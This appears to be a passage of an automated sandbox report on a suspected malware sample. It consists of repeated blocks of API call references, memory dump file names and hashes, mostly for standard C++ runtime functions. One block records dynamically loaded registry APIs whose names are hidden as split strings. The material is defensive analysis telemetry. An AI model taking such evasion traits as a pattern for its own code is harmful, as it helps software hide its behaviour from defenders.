                                  • Opcode Fuzzy Hash: aea368b7cbbc8cd1210328c9585d07067fb43aaa5f9bfa8f5e18812f550e7f26
                                  • Instruction Fuzzy Hash: 3231B1B1D002089BDB14DF54D982BEE77B4FB44321F14865EED22A72D1DB38AD44CB9A
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405E1D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405E40
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00405EC4
                                  • __CxxThrowException@8.LIBCMT ref: 00405ED2
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405EE5
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00405EFF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: F%@$bad cast
                                  • API String ID: 2427920155-3434137552
                                  • Opcode ID: 65536f8fc2f2bb19963cdfc39213ecb4cff8ade62ad2126ec5798af45b06981d
                                  • Instruction ID: 9ae9f6b10cc2249ea72c0d0f87f2ee015f6502937317e6e6103ba5e4811ceb80
                                  • Opcode Fuzzy Hash: 65536f8fc2f2bb19963cdfc39213ecb4cff8ade62ad2126ec5798af45b06981d
                                  • Instruction Fuzzy Hash: DE31BF319006049FDB14EF54D882BAFB7A4FB04321F14866EE956A72D1DB38AE04CFD9
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041DE5D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041DE80
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0041DF04
                                  • __CxxThrowException@8.LIBCMT ref: 0041DF12
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041DF25
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041DF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: F%@$bad cast
                                  • API String ID: 2427920155-3434137552
                                  • Opcode ID: 6d953ad7ef0ebc40da00cc9186620699c379573fb2ae198b389556fa4f0b942f
                                  • Instruction ID: 4d04c4e78dbc3ef4fec41ac34a4624523ae78f37153f495f19a8c8bf6698b95a
                                  • Opcode Fuzzy Hash: 6d953ad7ef0ebc40da00cc9186620699c379573fb2ae198b389556fa4f0b942f
                                  • Instruction Fuzzy Hash: 0731E2B1D006049FDB14DF54D882BEE7774FB14362F14865EE912AB2D1DB38AE44CB89
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?), ref: 03642F72
                                  • GetProcAddress.KERNEL32(00000000), ref: 03642F79
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: .dll$ADVA$PI32$RegG$etVa$lueA
                                  • API String ID: 2574300362-1882813265
                                  • Opcode ID: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                  • Instruction ID: b519ef73def871572e981cec88505ac3fccdf1f160eb87956056d2c8d4eb3fd6
                                  • Opcode Fuzzy Hash: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                  • Instruction Fuzzy Hash: DC2157B1D0125CAFDB10CFA8C988AEEBBBCFB08744F64446AF501B7240C6709A04CB64
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?), ref: 10002F6E
                                  • GetProcAddress.KERNEL32(00000000), ref: 10002F75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: .dll$ADVA$PI32$RegG$etVa$lueA
                                  • API String ID: 2574300362-1882813265
                                  • Opcode ID: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                  • Instruction ID: e549d43aef67382777316db0078eb220cca058ffe1a515555f97d50673392cdb
                                  • Opcode Fuzzy Hash: 992b54e621e4298502306d985922b6535659073c6f5a5d5f614955d1362188d0
                                  • Instruction Fuzzy Hash: 3A211D7190125EAFEB00DFA4D985AEEBBBCEF09284F204069E501B7241D7709E45CB74
                                  APIs
                                  • __CxxThrowException@8.LIBCMT ref: 00402FC6
                                    • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,ED2F953D,006FC518,00401FC3,?,0071C220,?,ED2F953D), ref: 00641CCB
                                  • std::exception::exception.LIBCMT ref: 00402FED
                                  • __CxxThrowException@8.LIBCMT ref: 0040300C
                                  • std::exception::exception.LIBCMT ref: 0040302E
                                  • __CxxThrowException@8.LIBCMT ref: 0040304D
                                  • std::exception::exception.LIBCMT ref: 0040306A
                                  • __CxxThrowException@8.LIBCMT ref: 00403089
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                  • String ID: ios_base::badbit set
                                  • API String ID: 4237746311-3882152299
                                  • Opcode ID: d055ba080e46d3afb165dd0b32a8c3fd06f509e51361a16332e909f32d278550
                                  • Instruction ID: bcf4659f536c84b5fb445d044c3d8a3bab5cc66639cc09fcead38813998a4a59
                                  • Opcode Fuzzy Hash: d055ba080e46d3afb165dd0b32a8c3fd06f509e51361a16332e909f32d278550
                                  • Instruction Fuzzy Hash: CD2192B10183055FC744EF98C9427ABBBEABFC8714F044A1EF59456281DB749648CB6B
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00669881
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066988B
                                  • int.LIBCPMT ref: 006698A2
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • collate.LIBCPMT ref: 006698C5
                                  • std::bad_exception::bad_exception.LIBCMT ref: 006698D9
                                  • __CxxThrowException@8.LIBCMT ref: 006698E7
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 006698FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2346505839-3145022300
                                  • Opcode ID: c7dcdce554f025be4bbdeb8c96ad32506d85fe65842861ed2f3df3756edf2ac8
                                  • Instruction ID: 76b82a961214e7fcd13cba6bad4578a43e34f2834f173bca1e77d5c1bd03d7df
                                  • Opcode Fuzzy Hash: c7dcdce554f025be4bbdeb8c96ad32506d85fe65842861ed2f3df3756edf2ac8
                                  • Instruction Fuzzy Hash: 3B018B319002099BCB45EBB0D846AFE762AAF40721F280A1DE9107B2D1CF78AA059799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 006610E3
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 006610ED
                                  • int.LIBCPMT ref: 00661104
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • messages.LIBCPMT ref: 00661127
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066113B
                                  • __CxxThrowException@8.LIBCMT ref: 00661149
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066115F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2525416601-3145022300
                                  • Opcode ID: 5267a9957ff807e0d8048dcfdb4c8a696385948f6b01c38c1e6100ef9e554526
                                  • Instruction ID: e31313b47818e4fa723cebde3304911d0e6d9bcfcc32675d63fa63f32350ad4b
                                  • Opcode Fuzzy Hash: 5267a9957ff807e0d8048dcfdb4c8a696385948f6b01c38c1e6100ef9e554526
                                  • Instruction Fuzzy Hash: 1C01A13190020997CB45EBB4D847AFEB737AF41720F14052DF6107B2D1DF789A458798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661180
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066118A
                                  • int.LIBCPMT ref: 006611A1
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 006611C4
                                  • std::bad_exception::bad_exception.LIBCMT ref: 006611D8
                                  • __CxxThrowException@8.LIBCMT ref: 006611E6
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 006611FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 1676052248-3145022300
                                  • Opcode ID: 144dfffc6cf9ecc199da783fef5036167a9ee660f9e02e39d3c36e6819f7d871
                                  • Instruction ID: dcf8e966f7f7ec9daa7d07fac8d87b5ef1b3e8221936871c71bbf339b4645cb8
                                  • Opcode Fuzzy Hash: 144dfffc6cf9ecc199da783fef5036167a9ee660f9e02e39d3c36e6819f7d871
                                  • Instruction Fuzzy Hash: 2201A13190020597CB05EBB0D853AFEB737AF41721F14061DF6107B2D1CF789A458799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066CA7F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066CA89
                                  • int.LIBCPMT ref: 0066CAA0
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • moneypunct.LIBCPMT ref: 0066CAC3
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066CAD7
                                  • __CxxThrowException@8.LIBCMT ref: 0066CAE5
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066CAFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2090539961-3145022300
                                  • Opcode ID: 67f399d63503d9145d7d7f64ca0e814bbd7a10c470f64cd645c21b791ffc8b76
                                  • Instruction ID: ec4f1ccdefa5ac39cf28df0df9828a9e6186cc863a4c66b3ea371a43a4c459d7
                                  • Opcode Fuzzy Hash: 67f399d63503d9145d7d7f64ca0e814bbd7a10c470f64cd645c21b791ffc8b76
                                  • Instruction Fuzzy Hash: 92018B31A006199BCB05EBA0C853AFE7737AB40725F14051EF9116B2D1DF78AA058799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660A24
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660A2E
                                  • int.LIBCPMT ref: 00660A45
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • ctype.LIBCPMT ref: 00660A68
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660A7C
                                  • __CxxThrowException@8.LIBCMT ref: 00660A8A
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660AA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 3532015510-3145022300
                                  • Opcode ID: a4a9e4347d902a243108e4174a03dfc018b233ad6e86e47f514dc31253819b02
                                  • Instruction ID: d35e4f58ef30ade2f85602cdb2ba920551ae3a08851aa5ef5a760c7967559598
                                  • Opcode Fuzzy Hash: a4a9e4347d902a243108e4174a03dfc018b233ad6e86e47f514dc31253819b02
                                  • Instruction Fuzzy Hash: E201C0319002199BDB05EBF4C842AFE7737AF40761F24062DF9107B2D2CF78AA058799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066C315
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066C31F
                                  • int.LIBCPMT ref: 0066C336
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • messages.LIBCPMT ref: 0066C359
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066C36D
                                  • __CxxThrowException@8.LIBCMT ref: 0066C37B
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C391
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2525416601-3145022300
                                  • Opcode ID: 6e4830b861aca5faf5c6526d7d3f3da468c763ce8c0744948eb1756581726238
                                  • Instruction ID: df48b73f9e3323648c589788dc7da250848a12aad9e379499e767c09342a382d
                                  • Opcode Fuzzy Hash: 6e4830b861aca5faf5c6526d7d3f3da468c763ce8c0744948eb1756581726238
                                  • Instruction Fuzzy Hash: 9201C0319006099BCB05EBB0C842AFE7737AF41720F14451DF9507B2E1DF78AA058798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066CB1C
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066CB26
                                  • int.LIBCPMT ref: 0066CB3D
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • moneypunct.LIBCPMT ref: 0066CB60
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066CB74
                                  • __CxxThrowException@8.LIBCMT ref: 0066CB82
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066CB98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2090539961-3145022300
                                  • Opcode ID: e5a919d2afa912a18971160e71f6e2328ff81e991e1b3ec4eb43d62a92f22d1b
                                  • Instruction ID: c6c9f33f117352a071202b358afcf3945dbc27f36b15f341f60357e51fc84453
                                  • Opcode Fuzzy Hash: e5a919d2afa912a18971160e71f6e2328ff81e991e1b3ec4eb43d62a92f22d1b
                                  • Instruction Fuzzy Hash: 7E01AD319006099BCB05EBB0DC43AFE7727AF40720F14061DF9107B2D1DF78AA059798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066C3B2
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066C3BC
                                  • int.LIBCPMT ref: 0066C3D3
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 0066C3F6
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066C40A
                                  • __CxxThrowException@8.LIBCMT ref: 0066C418
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C42E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 1676052248-3145022300
                                  • Opcode ID: 105b1fc00cd14f3dafaac35b09e175c8871968e761607b04bc0c4535f79579e3
                                  • Instruction ID: f248424363bbbad3d580fe2275bde8c291d67a9c41a002bbccda29ca57eed011
                                  • Opcode Fuzzy Hash: 105b1fc00cd14f3dafaac35b09e175c8871968e761607b04bc0c4535f79579e3
                                  • Instruction Fuzzy Hash: 1501AD319006099BCB05EBA0D852AFE7727AF80720F54051DF9107B2D1DF78AE458798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066CBB9
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066CBC3
                                  • int.LIBCPMT ref: 0066CBDA
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066CC11
                                  • __CxxThrowException@8.LIBCMT ref: 0066CC1F
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066CC35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast$|s
                                  • API String ID: 2227438316-4059296569
                                  • Opcode ID: 221dacccefe2c8353e94a940c9da4ee2e1c4a9156d46a232f285566f21abb79a
                                  • Instruction ID: 14e2d3f078a66b8d3e7272253945f6321af0704f225a677b50b7db09b780ca0d
                                  • Opcode Fuzzy Hash: 221dacccefe2c8353e94a940c9da4ee2e1c4a9156d46a232f285566f21abb79a
                                  • Instruction Fuzzy Hash: 0501AD71900A099BCB05EBB0D952AFEB737AF40720F14062DF9507B2D1DF78AA058799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066C44F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066C459
                                  • int.LIBCPMT ref: 0066C470
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 0066C493
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066C4A7
                                  • __CxxThrowException@8.LIBCMT ref: 0066C4B5
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C4CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
